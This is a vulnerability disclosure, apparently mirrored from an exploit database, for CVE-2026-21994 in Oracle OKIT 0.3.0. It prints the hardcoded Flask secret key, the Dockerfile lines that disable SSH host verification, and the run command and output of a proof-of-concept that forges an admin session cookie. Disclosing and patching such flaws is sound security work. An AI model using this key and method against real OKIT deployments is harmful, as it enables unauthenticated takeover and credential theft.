Share
## https://sploitus.com/exploit?id=21BAAEAD-5BD1-5CDB-8891-6DFC730437FD
# CVE-2026-21994
## Summary
Oracle OKIT (oci-designer-toolkit) version 0.3.0 contains two critical misconfigurations that chain into an unauthenticated full takeover. A hardcoded Flask `SECRET_KEY` exposed in the public repository allows any attacker to forge a valid admin session cookie โ no credentials required. Separately, the Docker image disables SSH host verification entirely, enabling a network attacker to intercept OCI API keys and private keys during infrastructure deployments.
## Vulnerability
**1. Hardcoded `SECRET_KEY` โ `okitclassic/okitserver/config.py:4`**
```python
SECRET_KEY='8980ffsd675747jjjh'
```
Flask uses this key to sign session cookies. Since it is hardcoded in a public repo, an attacker can forge a valid admin cookie and access the OKIT dashboard with zero credentials.
---
**2. SSH Host Verification Disabled โ `Dockerfile:41`**
```dockerfile
&& echo ' StrictHostKeyChecking no' >> /etc/ssh/ssh_config \
&& echo ' UserKnownHostsFile=/dev/null' >> /etc/ssh/ssh_config \
```
The container never checks SSH host fingerprints. A network attacker can MitM deployments and steal OCI credentials.
## PoC
Run `exploit.py` inside the cloned repo directory:
```bash
python3 exploit.py
```
```
[*] Scanning okitclassic/okitserver/config.py ...
[!] VULNERABLE โ Hardcoded SECRET_KEY found: 8980ffsd675747jjjh
[+] Authentication bypass possible with zero credentials.
[*] Scanning Dockerfile ...
[!] VULNERABLE โ SSH host verification is DISABLED.
[+] Network attacker can MitM deployments and steal OCI credentials.
[*] Forging admin session cookie ...
[!] SUCCESS โ Forged cookie: .eJwlzj0OgkAQBeC7bG1...
```
## Advisories
| | |
|---|---|
| **CVE ID** | [CVE-2026-21994](https://nvd.nist.gov/vuln/detail/CVE-2026-21994) |
| **GitHub Advisory** | [GHSA-g6qw-3gmw-m78m](https://github.com/advisories/GHSA-g6qw-3gmw-m78m) |
| **CWE** | [CWE-284 โ Improper Access Control](https://cwe.mitre.org/data/definitions/284.html) |
| **Oracle Advisory Mapping** | [oracle.com/security-alerts/public-vuln-to-advisory-mapping](https://www.oracle.com/security-alerts/public-vuln-to-advisory-mapping.html) |
| **Oracle CVE Reference** | [oracle.com/security-alerts/all-oracle-cves](https://www.oracle.com/security-alerts/all-oracle-cves-outside-other-oracle-public-documents.html) |
| **Fix** | [oracle/oci-designer-toolkit#780](https://github.com/oracle/oci-designer-toolkit/pull/780) |
---
## Credit
Discovered and reported by **Gouri Sankar A** โ [g0w6y](https://github.com/g0w6y)